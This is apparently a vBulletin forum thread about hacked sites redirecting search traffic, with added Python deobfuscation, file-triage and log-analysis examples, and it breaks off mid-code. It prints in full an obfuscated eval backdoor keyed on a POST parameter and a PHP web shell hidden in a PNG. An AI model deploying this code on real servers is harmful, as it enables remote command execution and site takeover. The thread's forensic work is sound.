Thanks for the update, Michael.
Security: Redirection to file2store.info
-
I have not tracked via logs on the client's server when it was done or how yet, but I did find more info on a hacked site.
- datastore table
-- plugins
--- global_start hook
PHP Code:
eval(CHR(36).CHR(120).CHR(61).CHR(39).@be84a99865650d96d3b8cfbea30adf99.CHR(39).CHR(59).@base64_decode('aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHhdKSkpO3Vuc2V0KCR4KTsNCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywwKTtpbmlfc2V0KCdsb2dfZXJyb3JzJywwKTsNCiRyPSFlbXB0eSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pID8gJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddIDogZ2V0ZW52KCdIVFRQX1JFRkVSRVInKTsNCmlmKHN0cmxlbigkcik+MTApDQp7DQoJJGlwPSRfU0VSVkVSWydSRU1PVEVfQUREUiddOyRobj1AZ2V0aG9zdGJ5YWRkcigkaXApOw0KCWlmKChzdHJwb3MoJGlwLCc2NS41NS4nKSE9PTApJiYoc3RycG9zKCRobiwnbXNuYm90Jyk9PT1mYWxzZSkpDQoJew0KCQkkcz1hcnJheSgnc2VhcmNoLmxpdmUuY29tJywnd3d3Lmdvb2dsZScsJ3NlYXJjaC55YWhvby5jb20nLCd3d3cuYmluZy5jb20nLCd5YW5kZXgucnUnLCdiYWlkdS5jb20nKTsNCgkJZm9yZWFjaCgkcyBhcyAkZSkNCgkJew0KCQkJaWYoKHN0cnBvcygkciwkZSkhPT1mYWxzZSkmJihlbXB0eSgkX0NPT0tJRVsndmJzcCddKSkpDQoJCQl7DQoJCQkJJGg9c3RydG91cHBlcihzdWJzdHIoQG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLDAsOCkpOw0KCQkJCWRpZSgiPGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiPnZhciB2YnNwPSckaCc7Ii5zdHJfcmVwbGFjZSgnXFwnLCdcXFxcJyxnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnWFZKcmM5b3dFUHdyTkRNZFNXT0hBQVlNY2QxTUFxUk4zMDM2K0dDcEhTRUxjSGc1eG9CVDVQL2VGU2xNcHJhUFcrM2UzaDB6MGhzNW82DQpQMVF1WEpja0ZUVjdyS25icmFqZGxPaDBkZXNWMm04M1VHOUVwZUVIS3VhU3F6bGI1WjVGU2RTY2FZUTZrSzFVdkpYbnV0aTdzOFN4Ymo2aQ0KaGJ6bnNUbWZXV3NhYkthWFRadWFybXl5ZVZlbTNHeWlBWjBSZUVWRE9kenFUUzlPelhtZnVrTTdiYlRwSVpqS2VuYkJkSEFFeUUwMGdKWXkNCnd1cDJGMDNFOGY5cXVnVUpRaWVMYjdRU0o4NjVBeVVHRzlESjUxeGdLMktkdWxZWHBjWTZHM2xWczlIaFFwSlh4SUhEdlFzY2dsWThMY3ZhDQpFcy80MU1TMHJ5aWd5akUvN0lGWS81Z21zKzUrckVQZUdULzRrLy9CTFVSejRDdFFTYThNVFNNUi95RC93VEtyOEFMeUUrOEVjcnBCQ0cvRA0KMkl2VDA1OUJqeEtRcFhQT0ZqUy9YNU5WcU5MSHhqZnpLWTBuMkpCbnF3MUFxSEdMNGJQc2I3RmtLMm4yOUgyMDErOHUvOGFqOXZEbjJHZkkNCmNsYktNcFRsZHdyaERmNEp0aERSSGNWbnAwNDY3WkxxL2NoNFBLTzhxQyswaEdkU0dvelRWazV2eGdRVjdaaGpKcUNNZXlubVdEQXFncFJMDQpoeFpOUVN6dHJaQXJSRkdmU29qSHpoeXFnam5xcTZxSkxSWitGOERZamI2dHFQbU9QenUxYjRzdE0yUmZzYTBUS0YzMFR1SXRkTTBRRG5lNg0KYncrclp1VklrN2hWWHJDSnY3cG1naCt3MWdWTFVIaUI2aVl6WXlPenE4STJvY1VjdkVTN1dlNjBXT2NoOERyakRNRGh5WUpCMHFoYVp0Z3gNCnNFRmMwOU94QXJlcGVtTDNPTkE4cWJzUGtkNUw2cHc5bnl6R2E0U3MzaHprSzBmZkVIUE05MDJzMmFmWER3U1hXVnpwS2NFb05iV0hOM0pXDQpOL0FRJykpKS4iPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4iKTsNCgkJCX0NCgkJfQ0KCX0gDQp9'));
http://www.szone.us | http://www.gzhq.net
Twitter | Facebook | My:Hacks @ vBulletin.org
Member of Kiwanis Club of Chatsworth
-
I also have this problem.
I have not tracked via logs on the client's server when it was done or how yet, but I did find more info on a hacked site.
- datastore table
-- plugins
--- global_start hook
PHP Code:
eval(CHR(36).CHR(120).CHR(61).CHR(39).@be84a99865650d96d3b8cfbea30adf99.CHR(39).CHR(59).@base64_decode('aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHhdKSkpO3Vuc2V0KCR4KTsNCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywwKTtpbmlfc2V0KCdsb2dfZXJyb3JzJywwKTsNCiRyPSFlbXB0eSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pID8gJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddIDogZ2V0ZW52KCdIVFRQX1JFRkVSRVInKTsNCmlmKHN0cmxlbigkcik+MTApDQp7DQoJJGlwPSRfU0VSVkVSWydSRU1PVEVfQUREUiddOyRobj1AZ2V0aG9zdGJ5YWRkcigkaXApOw0KCWlmKChzdHJwb3MoJGlwLCc2NS41NS4nKSE9PTApJiYoc3RycG9zKCRobiwnbXNuYm90Jyk9PT1mYWxzZSkpDQoJew0KCQkkcz1hcnJheSgnc2VhcmNoLmxpdmUuY29tJywnd3d3Lmdvb2dsZScsJ3NlYXJjaC55YWhvby5jb20nLCd3d3cuYmluZy5jb20nLCd5YW5kZXgucnUnLCdiYWlkdS5jb20nKTsNCgkJZm9yZWFjaCgkcyBhcyAkZSkNCgkJew0KCQkJaWYoKHN0cnBvcygkciwkZSkhPT1mYWxzZSkmJihlbXB0eSgkX0NPT0tJRVsndmJzcCddKSkpDQoJCQl7DQoJCQkJJGg9c3RydG91cHBlcihzdWJzdHIoQG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLDAsOCkpOw0KCQkJCWRpZSgiPGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiPnZhciB2YnNwPSckaCc7Ii5zdHJfcmVwbGFjZSgnXFwnLCdcXFxcJyxnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnWFZKcmM5b3dFUHdyTkRNZFNXT0hBQVlNY2QxTUFxUk4zMDM2K0dDcEhTRUxjSGc1eG9CVDVQL2VGU2xNcHJhUFcrM2UzaDB6MGhzNW82DQpQMVF1WEpja0ZUVjdyS25icmFqZGxPaDBkZXNWMm04M1VHOUVwZUVIS3VhU3F6bGI1WjVGU2RTY2FZUTZrSzFVdkpYbnV0aTdzOFN4Ymo2aQ0KaGJ6bnNUbWZXV3NhYkthWFRadWFybXl5ZVZlbTNHeWlBWjBSZUVWRE9kenFUUzlPelhtZnVrTTdiYlRwSVpqS2VuYkJkSEFFeUUwMGdKWXkNCnd1cDJGMDNFOGY5cXVnVUpRaWVMYjdRU0o4NjVBeVVHRzlESjUxeGdLMktkdWxZWHBjWTZHM2xWczlIaFFwSlh4SUhEdlFzY2dsWThMY3ZhDQpFcy80MU1TMHJ5aWd5akUvN0lGWS81Z21zKzUrckVQZUdULzRrLy9CTFVSejRDdFFTYThNVFNNUi95RC93VEtyOEFMeUUrOEVjcnBCQ0cvRA0KMkl2VDA1OUJqeEtRcFhQT0ZqUy9YNU5WcU5MSHhqZnpLWTBuMkpCbnF3MUFxSEdMNGJQc2I3RmtLMm4yOUgyMDErOHUvOGFqOXZEbjJHZkkNCmNsYktNcFRsZHdyaERmNEp0aERSSGNWbnAwNDY3WkxxL2NoNFBLTzhxQyswaEdkU0dvelRWazV2eGdRVjdaaGpKcUNNZXlubVdEQXFncFJMDQpoeFpOUVN6dHJaQXJSRkdmU29qSHpoeXFnam5xcTZxSkxSWitGOERZamI2dHFQbU9QenUxYjRzdE0yUmZzYTBUS0YzMFR1SXRkTTBRRG5lNg0KYncrclp1VklrN2hWWHJDSnY3cG1naCt3MWdWTFVIaUI2aVl6WXlPenE4STJvY1VjdkVTN1dlNjBXT2NoOERyakRNRGh5WUpCMHFoYVp0Z3gNCnNFRmMwOU94QXJlcGVtTDNPTkE4cWJzUGtkNUw2cHc5bnl6R2E0U3MzaHprSzBmZkVIUE05MDJzMmFmWER3U1hXVnpwS2NFb05iV0hOM0pXDQpOL0FRJykpKS4iPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4iKTsNCgkJCX0NCgkJfQ0KCX0gDQp9'));
I found the same code.
-
Ran the code through a base64 decode:
PHP Code:
if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x);
ini_set('display_errors',0);ini_set('log_errors',0);
$r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');
if(strlen($r)>10)
{
$ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip);
if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false))
{
$s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com');
foreach($s as $e)
{
if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp'])))
{
$h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8));
die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVJrc9owEPwrNDMdSWOHAAYMcd1MAqRN3036+GCpHSELcHg5xoBT5P/eFSlMpraPW+3e3h0z0hs5o6
P1QuXJckFTV7rKnbrajdlOh0desV2m83UG9EpeEHKuaSqzlb5Z5FSdScaYQ6kK1UvJXnuti7s8Sxbj6i
hbznsTmfWWsabKaXTZuarmyyeVem3GyiAZ0ReEVDOdzqTS9OzXmfukM7bbTpIZjKenbBdHAEyE00gJYy
wup2F03E8f9qugUJQieLb7QSJ865AyUGG9DJ51xgK2KdulYXpcY6G3lVs9HhQpJXxIHDvQscglY8Lcva
Es/41MS0ryigyjE/7IFY/5gms+5+rEPeGT/4k//BLURz4CtQSa8MTSMR/yD/wTKr8ALyE+8EcrpBCG/D
2IvT059BjxKQpXPOFjS/X5NVqNLHxjfzKY0n2JBnqw1AqHGL4bPsb7FkK2n29H201+8u/8aj9vDn2GfI
clbKMpTldwrhDf4JthDRHcVnp0467ZLq/ch4PKO8qC+0hGdSGozTVk5vxgQV7ZhjJqCMeynmWDAqgpRL
hxZNQSztrZArRFGfSojHzhyqgjnqq6qJLRZ+F8DYjb6tqPmOPzu1b4stM2Rfsa0TKF30TuItdM0QDne6
bw+rZuVI+7hVXrCJv7pmgh+w1gVLUHiB6iYzYyOzq8I2ocUcvES7We60WOch8DrjDMDhyYJB0qhaZtgx
sEFc09OxArepemL3ONA8qbsPkd5L6pw9nyzGa4Ss3hzkK0ffEHPM902s2afXDwSXWVzpKcEoNbWHN3JW
N/AQ')))."</script></body></html>");
}
}
}
}
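A way to unwrap the layers in the snippet above without running any of it, added here as an example (this is not code from the thread and not how the poster decoded it): it resolves the CHR() concatenation, treats the `@bareword` as the PHP 5 trick where an undefined constant evaluates to its own name (which is how `$x` gets its 32-character value), and then decodes nested base64_decode / gzinflate / str_rot13 calls until it reaches something that needs attacker input. SAMPLE is constructed: the outer layer copies the pattern and constant name posted above, but its base64 re-encodes only the first decoded line, so it is far shorter than the real one. The gzinflate layer is demonstrated on a made-up redirect script compressed at run time; example.invalid is a placeholder host.

```python
"""Statically unwrap the obfuscation in the injected datastore code (CHR()
concatenation, a PHP 5 bareword constant, nested base64_decode / gzinflate /
str_rot13) without executing any PHP.  Added example, not from the thread."""
import base64
import codecs
import re
import zlib

# Constructed input: same outer pattern and constant name as the thread's
# snippet, but the base64 re-encodes only the first decoded line.
SAMPLE = (
    "eval(CHR(36).CHR(120).CHR(61).CHR(39).@be84a99865650d96d3b8cfbea30adf99"
    ".CHR(39).CHR(59).@base64_decode('aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNl"
    "NjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHhdKSkpO3Vuc2V0KCR4KTs='));"
)
UNRESOLVED = "<<"   # marks operands that need runtime data ($_POST ...)


def _walk(src):
    """Yield (index, char, paren depth, inside-quotes) over PHP source."""
    depth, quote, esc = 0, None, False
    for i, ch in enumerate(src):
        if quote:
            yield i, ch, depth, True
            if esc:
                esc = False
            elif ch == "\\":
                esc = True
            elif ch == quote:
                quote = None
        else:
            if ch in "'\"":
                quote = ch
            depth += (ch == "(") - (ch == ")")
            yield i, ch, depth, False


def split_concat(expr):
    """Split a PHP expression on top-level '.' (outside quotes/parentheses)."""
    parts, cur = [], []
    for _i, ch, depth, quoted in _walk(expr):
        if ch == "." and depth == 0 and not quoted:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]


def balanced_arg(src, start):
    """Text between the '(' at src[start] and its matching ')'."""
    for i, ch, depth, quoted in _walk(src[start:]):
        if ch == ")" and depth == 0 and not quoted:
            return src[start + 1:start + i]
    raise ValueError("unbalanced parentheses")


def resolve_expr(expr):
    """Evaluate a PHP concatenation into the string PHP would build."""
    return "".join(resolve_operand(p) for p in split_concat(expr))


def resolve_operand(op):
    m = re.fullmatch(r"@?CHR\((\d+)\)", op, re.I)
    if m:
        return chr(int(m.group(1)))
    m = re.fullmatch(r"'((?:[^'\\]|\\.)*)'", op, re.S)
    if m:
        return m.group(1).replace("\\'", "'").replace("\\\\", "\\")
    m = re.fullmatch(r'"((?:[^"\\]|\\.)*)"', op, re.S)
    if m:
        return m.group(1)          # no variable interpolation attempted
    m = re.fullmatch(r"@?([A-Za-z_]\w*)", op)
    if m:
        # PHP 5: an undefined bareword constant evaluates to its own name;
        # the '@' hides the notice.  This is how $x gets its value.
        return m.group(1)
    m = re.fullmatch(r"@?(base64_decode|gzinflate|str_rot13)\((.*)\)", op, re.I | re.S)
    if m:
        fn, inner = m.group(1).lower(), resolve_expr(m.group(2))
        if UNRESOLVED in inner:
            return UNRESOLVED + op + ">>"
        if fn == "base64_decode":
            return base64.b64decode(re.sub(r"\s+", "", inner)).decode("latin-1")
        if fn == "gzinflate":      # raw DEFLATE stream, no zlib/gzip header
            return zlib.decompress(inner.encode("latin-1"), -15).decode("latin-1")
        return codecs.encode(inner, "rot13")
    return UNRESOLVED + op + ">>"


def peel(src, call="eval", max_layers=5):
    """Replace the first call(...) with the string it would receive, repeatedly.
    Layers come back outermost first; stops when no call is left or the
    argument needs attacker input (the $_POST backdoor line)."""
    pat = re.compile(r"\b%s\s*\(" % re.escape(call), re.I)
    layers = [src]
    for _ in range(max_layers):
        m = pat.search(layers[-1])
        if not m:
            break
        decoded = resolve_expr(balanced_arg(layers[-1], m.end() - 1))
        if UNRESOLVED in decoded:
            break
        layers.append(decoded)
    return layers


def make_redirect_sample():
    """Constructed die("<script>".gzinflate(base64_decode('...'))."</script>")
    wrapper like the decoded payload's, around a made-up script; returns (php, script)."""
    script = ("var vbsp='0A1B2C3D';document.cookie='vbsp='+vbsp;"
              "location.replace('http://example.invalid/');")
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(script.encode()) + comp.flush()
    php = ('die("<script>".gzinflate(base64_decode(\'%s\'))."</script>");'
           % base64.b64encode(raw).decode())
    return php, script


if __name__ == "__main__":
    print(*peel(SAMPLE), sep="\n")
    print(peel(make_redirect_sample()[0], "die")[-1])
```

`peel(SAMPLE)` stops after the second layer, at `eval(base64_decode(str_rot13($_POST[$x])))`, and that stop is the point: the line is a general-purpose backdoor keyed on a POST parameter named by the 32-character constant, so the redirect is only the visible symptom; until the datastore entry is gone, anyone who knows that name can run arbitrary PHP on the site. On the real payload the same `peel(src, "die")` call unwraps the gzinflate'd JavaScript that does the search-engine-referrer redirect.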
-
Fixing the redirect problem is easy.
In my case it was stuck in the datastore via a script that was run. It did not show up in any plugins in the AdminCP.
I found it via a phpMyAdmin search of the database, looking for "base64" as a search term across all tables and data.
I also downloaded the site and did a search across all files and found the same info in the datastore cache file.
- /forums/includes/datastore/datastore_cache.php
Finding out how they got in and plugging the hole will be a little work.
(Looking through installed 3rd-party code add-ons for holes.)
On another note, a colleague was working on a site and found a PNG image with PHP code in it.
- profilepic60_1.png
PHP Code:
<?php
ob_end_clean(); ob_start();
$disablefuncs = array();
function myshellexec($cmd) {
    global $disablefuncs;
    if (empty($cmd)) { return ''; }
    $result = '';
    if (is_callable('exec') and !in_array('exec', $disablefuncs)) {
        exec($cmd, $result); $result = join("\n", $result);
    } elseif (($result = `$cmd`) !== FALSE) {
    } elseif (is_callable('system') and !in_array('system')) {
        ob_start(); system($cmd); $result = ob_get_contents(); ob_clean();
    } elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) {
        ob_start(); passthru($cmd); $result = ob_get_contents(); ob_clean();
    } elseif (is_resource($fp = popen($cmd,"r"))) {
        while(!feof($fp)) { $result .= fread($fp, 1024); }
        pclose($fp);
    } else {
        $result = '****. Can\'t execute command - paranoidal admin[s] has been disabled many functions!';
    }
    return $result;
}
if (is_callable('ini_get')) {
    $disablefuncs = ini_get("disable_functions");
    if (!empty($disablefuncs)) {
        $disablefuncs = str_replace(' ', '', $disablefuncs);
        $disablefuncs = explode(',', $disablefuncs);
    } else {
        $disablefuncs = array();
    }
}
if (isset($_POST['execl'])) { echo $_POST['execl']. '<br>'; echo myshellexec($_POST['execl']); }
if (isset($_POST['pcntl_exec'])) { pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']); }
if (isset($_FILES['upfile'])) {
    if (is_uploaded_file($_FILES['upfile']['tmp_name'])) {
        move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']);
        echo '<b>Uploaded!</b>';
    }
}
?><br>
</pre>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit">
</form><br>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit">
</form>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">
upload: <input type="text" name="fname" style="width:200px" value="profilepic605_1.png"><input type="file" name="upfile" style="width:70%"><input type="submit">
</form>
<script>document.getElementById("bash").focus();</script>
</font>
<?php
$text = str_replace("\n", '<br />', ob_get_contents()); ob_end_clean(); echo $text; ?>
Last edited by Zachariah B; Mon 28 Jun '10, 2:58pm.
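The two hiding places described in the post above, injected code in the datastore cache file and a PHP shell inside a profile picture, can be hunted with a small file walker. This is an added example, not the poster's procedure or vBulletin code; it scans a throwaway webroot that it builds itself, with file names modelled on the post (customprofilepics/profilepic60_1.png, includes/datastore/datastore_cache.php) and made-up contents. The indicator patterns come from the snippets posted in this thread.

```python
"""Triage a vBulletin webroot for the two hiding places described above: PHP
injected into the datastore cache and PHP planted inside image uploads.
Added example, not code from the thread; the webroot it scans is a throwaway
fixture built by build_fixture()."""
import os
import re
import shutil
import tempfile

# Indicators taken from the snippets posted in this thread.  Hits are triage
# leads for a human to read, not verdicts.
CODE_IOCS = re.compile(
    rb"eval\s*\(|gzinflate\s*\(|str_rot13\s*\(|CHR\(\d+\)\s*\.\s*CHR|\$_POST\[\$x\]",
    re.I,
)
PHP_TAG = re.compile(rb"<\?php|<\?=|<script\s+language\s*=\s*[\"']?php", re.I)
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
CODE_EXT = {".php", ".inc", ".phtml"}


def triage_file(path):
    """Return (reason, path) findings for one file."""
    findings = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read()
    if ext in IMAGE_MAGIC:
        if not data.startswith(IMAGE_MAGIC[ext]):
            findings.append(("image extension but wrong magic bytes", path))
        if PHP_TAG.search(data):
            # A valid image header does not make the file safe: PHP after the
            # pixel data is what profilepic60_1.png carried.  It only runs if
            # the server can be made to execute it, so also review the
            # handler config / .htaccess for the upload directory.
            findings.append(("PHP open tag inside image file", path))
    elif ext in CODE_EXT and CODE_IOCS.search(data):
        findings.append(("eval/obfuscation indicators in PHP", path))
    return findings


def triage_tree(root):
    """Walk root and return all findings sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            findings.extend(triage_file(os.path.join(dirpath, name)))
    return sorted(findings, key=lambda f: f[1])


def _write(root, rel, data):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def build_fixture():
    """Constructed webroot: one clean PNG, one PNG with a PHP shell stub
    appended (modelled on the post above, not the real file), a clean PHP
    file, and a datastore cache carrying the CHR()/base64 eval stub."""
    root = tempfile.mkdtemp(prefix="vb_triage_")
    png = IMAGE_MAGIC[".png"] + b"\x00" * 32          # fake pixel data
    _write(root, "forums/customprofilepics/profilepic61_1.png", png)
    _write(root, "forums/customprofilepics/profilepic60_1.png",
           png + b"<?php if (isset($_POST['execl'])) { system($_POST['execl']); } ?>")
    _write(root, "forums/index.php", b"<?php require_once('./global.php'); ?>")
    _write(root, "forums/includes/datastore/datastore_cache.php",
           b"<?php // constructed cache entry\n"
           b"$plugins = 'eval(CHR(36).CHR(120).CHR(61).@base64_decode(\\'aWY=\\'));';\n")
    return root


def run_demo():
    """Build the fixture, triage it, clean up, and return the findings."""
    root = build_fixture()
    try:
        return triage_tree(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for reason, path in run_demo():
        print("%-40s %s" % (reason, path))
```

Point `triage_tree()` at a downloaded copy of the site instead of the fixture to reproduce the file-side half of the search described in the post; the database side (the datastore table itself) still needs the phpMyAdmin or SQL search for the same strings, since the cache file only mirrors what is in that table.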
-
You should be looking in the web server logs, about the time your on-disk files were modified.
-
I found it via a phpMyAdmin search of the database, looking for "base64" as a search term across all tables and data.
I have the problem too, only on the index page. Two forums on the same server, two times the problem.
But no idea how to solve the problem, or where it comes from. What can I find in the server log, for example?
Last edited by thompson; Wed 30 Jun '10, 11:27am.
-
The problem is in the datastore table.
When you disable/enable a product, the datastore is refreshed and the problem is solved...
How can you prevent the datastore from being changed from the outside?
-
It may also depend on a product that we all have.
I have:
Advanced BBCode Permissions
Automatic Thread Tagger
Buy Thread
Cyb - Advanced Forum Statistics
Cyb - Tic-Tac-Toe
Doublepost Prevention Plus
Easy Forms
Geek Auto-Linker
Hide BB Codes
Invitation System
KX - Spider Permissions
MGC chatbox Evo
Mobile Device Detection
Mobile Style Options
Post Thank You Hack
Quick Editor Improver
Resize Image By Moonlight Knight
Rotating Banner System
Sorky03 - SubForum List Control - V1.8.0
Spider Display
TagCloud - ForumHome
UserGroups Legend In Forumhome
vBSEO
vBSEO :: Sitemap Generator
vBSEO.com Style 2.0
vbStopForumSpam
Who Has Read a Thread.
Yet Another Mass Private Message System
-
More findings:
They are logging in using the username and password of an Admin on the site.
This username and password was harvested via spyware / malware / key logger.
- Scan / Clean your personal computer for problems
- Change your VB password for your AdminCP accounts
Server Access Log:
Code:
7/12/2010 5:14:06 AM Search String: 204.45.70.118
Line 3703 - <204.45.70.118> - - [12/Jul/2010:07:43:05 -0400] "GET /admincp/ HTTP/1.1" 200 2339 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
Line 3734 - <204.45.70.118> - - [12/Jul/2010:07:43:36 -0400] "POST /login.php?do=login HTTP/1.1" 302 20 "/admincp/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
Line 3803 - <204.45.70.118> - - [12/Jul/2010:07:45:31 -0400] "POST /admincp/plugin.php?do=update HTTP/1.1" 200 1709 "/admincp/plugin.php?do=edit&pluginid=320" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
Reported Abuse:
IP Information for 204.45.70.118
IP Location: United States United States Woodstock Fdc Servers.net Llc
Resolve Host: fdc5.lrdns.com
IP Address: 204.45.70.118 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
OrgName: FDCservers.net
OrgID: FDCSE
Address: 141 w jackson blvd.
Address: suite #1135
City: Chicago
StateProv: IL
PostalCode: 60098
Country: US
ReferralServer: rwhois://rwhois.fdcservers.net:4321
NetRange: 204.45.0.0 - 204.45.255.255
CIDR: 204.45.0.0/16
OriginAS: AS30058
NetName: FDCSERVERS
NetHandle: NET-204-45-0-0-1
Parent: NET-204-0-0-0-0
NetType: Direct Allocation
NameServer: NS3.FDCSERVERS.NET
NameServer: NS4.FDCSERVERS.NET
Comment:
RegDate: 2009-07-20
Updated: 2009-07-20
RAbuseHandle: ABUSE438-ARIN
RAbuseName: ABUSE department
RAbusePhone: +1-630-729-0228
RAbuseEmail: [email protected]
-
They did not get past the password change, but I have logs:
Code:
7/12/2010 2:41:06 PM Search String: 72.113.214.199
Line 19861 - <72.113.214.199> - - [12/Jul/2010:16:59:59 -0400] "POST /login.php?do=login HTTP/1.1" 302 20 "/admincp/" "Linux; U; Android 2.1-update1; en-us; Droid Build/ESE81) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17"
Line 19901 - <72.113.214.199> - - [12/Jul/2010:17:02:21 -0400] "GET /admincp/plugin.php?do=edit&pluginid=320 HTTP/1.1" 200 2360 "-" "Mozilla/5.0 (Linux; U; Android 2.1-update1; en-us; Droid Build/ESE81) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17"
Line 19910 - <72.113.214.199> - - [12/Jul/2010:17:03:41 -0400] "POST /admincp/plugin.php?do=update HTTP/1.1" 200 1709 "/admincp/plugin.php?do=edit&pluginid=320" "Mozilla/5.0 (Linux; U; Android 2.1-update1; en-us; Droid Build/ESE81) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17"
OrgName: Cellco Partnership DBA Verizon Wireless
OrgID: CLLC
Address: 180 Washington Valley Road
City: Bedminster
StateProv: NJ
PostalCode: 07039
Country: US
NetRange: 72.96.0.0 - 72.127.255.255
CIDR: 72.96.0.0/11
NetName: WIRELESSDATANEWORK
NetHandle: NET-72-96-0-0-1
Parent: NET-72-0-0-0-0
NetType: Direct Allocation
NameServer: CARKDNS.VZWDOMAIN.COM
NameServer: NJBRDNS.VZWDOMAIN.COM
Comment:
RegDate: 2005-06-28
Updated: 2006-01-18
RTechHandle: MGE16-ARIN
RTechName: George, Matt
RTechPhone: +1-908-306-7000
RTechEmail: [email protected]
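Both log excerpts above show the same sequence: a login POST to /login.php?do=login with /admincp/ as referer, then a POST to /admincp/plugin.php?do=update, from two unrelated networks within ten hours of each other. As an added example (not the poster's tooling, and not vBulletin code), here is that check in Python over constructed Apache combined-format lines built from the two excerpts (same addresses, paths and timestamps, with one unrelated visitor line added): it pairs every state-changing AdminCP POST with the login that preceded it from the same address and lists the distinct source/user-agent pairs.

```python
"""Pull AdminCP activity out of an Apache combined-format access log and pair
each state-changing request with the login that preceded it from the same
address.  Added example, not code from the thread.  SAMPLE_LOG is constructed
from the excerpts posted above (same addresses, paths and timestamps) plus one
unrelated visitor line."""
import re
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/login.php?do=login"
# AdminCP requests that change state; plugin.php?do=update is the one that
# wrote the redirect code into the datastore in this thread.
ADMIN_WRITE = re.compile(r"^/admincp/\w+\.php\?do=(update|insert|import|delete|save)", re.I)

FF = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
DROID = ("Mozilla/5.0 (Linux; U; Android 2.1-update1; en-us; Droid Build/ESE81) "
         "AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17")
SAMPLE_LOG = [  # constructed, modelled on the two posted excerpts
    '204.45.70.118 - - [12/Jul/2010:07:43:05 -0400] "GET /admincp/ HTTP/1.1" 200 2339 "-" "%s"' % FF,
    '204.45.70.118 - - [12/Jul/2010:07:43:36 -0400] "POST /login.php?do=login HTTP/1.1" 302 20 "/admincp/" "%s"' % FF,
    '204.45.70.118 - - [12/Jul/2010:07:45:31 -0400] "POST /admincp/plugin.php?do=update HTTP/1.1" 200 1709 "/admincp/plugin.php?do=edit&pluginid=320" "%s"' % FF,
    '198.51.100.7 - - [12/Jul/2010:09:00:00 -0400] "GET /showthread.php?t=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko"',
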